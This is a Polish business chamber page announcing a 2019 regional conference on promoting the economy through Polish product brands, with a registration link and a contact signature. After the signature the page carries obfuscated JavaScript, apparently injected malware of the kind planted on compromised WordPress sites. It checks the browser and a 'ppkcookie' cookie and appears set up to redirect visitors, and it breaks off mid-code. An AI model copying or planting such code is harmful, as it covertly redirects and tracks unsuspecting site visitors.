Promocja gospodarki w oparciu o polskie marki produktowe- Marka Polskiej Gospodarki-Brand | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo

Ministerstwo Przedsiębiorczości i Technologii organizuje konferencję pn. Promocja gospodarki w oparciu o polskie marki produktowe- Marka Polskiej Gospodarki-Brand”.

Konferencje regionalne odbywać się będą w 10 miastach Polski. Jednym z miast będzie Szczecin.

Wydarzenie dedykowane jest dla : mikro, małych i średnich przedsiębiorców oraz przedstawicieli instytucji wspierających rozwój przedsiębiorstw.

Konferencja składać się będzie z części:

  • plenarnej, podczas której zostaną zaprezentowane informacje na temat instrumentów wsparcia dla przedsiębiorców w obszarze rozwoju eksportu i inwestycji
  • panelowej, poświęconej omówieniu i przedyskutowaniu z uczestnikami konferencji obszarów istotnych dla działalności przedsiębiorstw

 

Konferencja odbędzie się 5 marca 2019r. w Hotelu Park.

Formularz zgłoszeniowy oraz wszelkie szczegóły oraz osoby do kontaktu  znajdują się w linku http://www.crps.pl/oferta/szkolenia/polskamarka.html?fbclid=IwAR3RjKPxVypYXyXKOgtTju3bqpshH-t-EkqmKGJ6eh8Kh1WxKrW9mkEGgcg

Serdecznie pozdrawiam

Estera Butkiewicz

 

Urząd Marszałkowski Województwa Zachodniopomorskiego

Centrum Obsługi Inwestorów i Eksporterów

 Św. Ducha 2, 70-205 Szczecin

tel. (+48 91) 432 96 82

e-mail: ebutkiewicz@wzp.pl

www.coi.wzp.pl 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m